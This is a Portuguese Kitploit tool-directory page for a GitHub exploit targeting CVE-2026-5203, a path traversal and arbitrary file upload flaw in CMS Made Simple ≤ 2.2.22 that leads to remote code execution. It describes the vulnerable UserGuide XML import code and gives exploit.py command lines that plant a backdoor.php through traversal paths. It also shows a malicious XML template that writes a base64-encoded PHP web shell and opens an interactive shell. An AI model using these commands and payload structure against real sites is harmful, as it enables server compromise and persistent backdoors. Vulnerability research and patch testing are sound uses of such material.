Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-5203 — Exploit para CVE-2026-5203 no CMS Made Simple, aproveitando path traversal e upload arbitrário de arquivos para alcançar execução remota de código com um shell interativo. | Kitploit
Ferramentas/GitHubGitHub/caginkyr/cve-2026-5203
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubcaginkyr/cve-2026-5203

CVE-2026-5203

Exploit para CVE-2026-5203 no CMS Made Simple, aproveitando path traversal e upload arbitrário de arquivos para alcançar execução remota de código com um shell interativo.

Ver Repositório
2há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-5203 — CMS Made Simple ≤ 2.2.22 RCE (Path Traversal + Upload Arbitrário de Arquivos)

CVSS Version Type

Resumo

A funcionalidade de importação XML do módulo UserGuide no CMS Made Simple ≤ 2.2.22 não sanitiza corretamente os nomes de arquivos fornecidos pelo usuário, permitindo que um administrador autenticado faça upload de arquivos arbitrários (ex.: shells PHP) em qualquer lugar no sistema de arquivos do servidor através de sequências de path traversal.

CampoValor
TipoPath Traversal / Upload Arbitrário de Arquivos → RCE
ComponenteMódulo UserGuide — Importação XML
Arquivo Afetadomodules/UserGuide/lib/class.UserGuideImporterExporter.php
CVSS v3.17.2 HIGH — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Autenticação NecessáriaSim (Administrador)

Código Vulnerável

root@kitploit:~
// modules/UserGuide/lib/class.UserGuideImporterExporter.php (~L250-280)
$filename = (string) $xmlFile->filename;
$isdir    = (string) $xmlFile->isdir;   

A função escreve o conteúdo decodificado em Base64 diretamente no caminho controlado pelo atacante.


Uso

root@kitploit:~
python exploit.py <base_url> <admin_url> <username> <password> [upload_path]

Exemplos:

root@kitploit:~
# Caminho padrão
python exploit.py http://target.com http://target.com/admin admin password123

# Caminho personalizado
python exploit.py http://target.com http://target.com/admin admin password123 \
  ../../../../../../var/www/html/backdoor.php

O shell interativo é iniciado automaticamente se o web shell estiver acessível após o upload.


Estrutura Maliciosa XML

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<modulecontent>
  <module>UserGuide</module>
  <version>1.3</version>
  <files>
    <file>
      <filename>../../../webshell.php</filename>
      <isdir>0</isdir>
      <data>[BASE64_ENCODED_PHP_CODE]</data>
    </file>
  </files>
</modulecontent>
Baixar ferramenta